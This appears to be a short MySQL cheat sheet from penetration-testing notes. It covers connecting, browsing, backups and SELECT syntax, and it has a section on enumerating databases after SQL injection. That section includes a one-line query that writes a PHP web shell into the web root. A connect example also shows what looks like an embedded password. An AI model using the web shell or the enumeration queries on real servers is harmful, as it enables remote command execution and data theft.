#
MySQL
#
Config file
location: /etc/mysql/my.cnf
#
Connect to MySQL
mysql is a command-line client program that allows you to interact with MySQL in the interactive and non-interactive mode. The mysql command-line client is typically located in the bin directory of the MySQL’s installation folder.
mysql -u fooUser -p -h 10.10.10.10 -P 3306
mysql -u drupaluser -p"CQHEy@9M*m23gBVj' mattermost
-u root means that you connect to the MySQL Server using the user account root. -p instructs mysql to prompt for a password. -h specifies host -P specifies port
#
browsing
SHOW DATABASES;
SHOW TABLES;
SHOW FIELDS FROM table / DESCRIBE table;
SHOW CREATE TABLE table;
SHOW PROCESSLIST;
KILL process_number;
#
backup db to file
mysqldump -u Username -p dbNameYouWant > databasename_backup.sql
#
Enumerating from SQLi
SELECT user(); #show current user
select schema_name from information_schema.schemata #show schemas
select table_name from information_schema.tables where table_schema = 'users' #show tables in users schema
select column_name from information_schema.columns where table_name = 'users' #show columns in users table
select privilege_type FROM information_schema.user_privileges where grantee = "'user'@'localhost'" #show privileges for user@localhost
select "We were here!" into outfile '/var/www/html/test.txt' #Write out to a file (if user has FILE privs).
select "<?php SYSTEM($_REQUEST['cmd']); ?>" into outfile '/var/www/html/webshell.php' #Write out a webshell
#
selects
SELECT * FROM table;
SELECT * FROM table1, table2;
SELECT field1, field2 FROM table1, table2;
SELECT ... FROM ... WHERE condition
SELECT ... FROM ... WHERE condition GROUPBY field;
SELECT ... FROM ... WHERE condition GROUPBY field HAVING condition2;
SELECT ... FROM ... WHERE condition ORDER BY field1, field2;
SELECT ... FROM ... WHERE condition ORDER BY field1, field2 DESC;
SELECT ... FROM ... WHERE condition LIMIT 10;
SELECT DISTINCT field1 FROM ...
SELECT DISTINCT field1, field2 FROM ...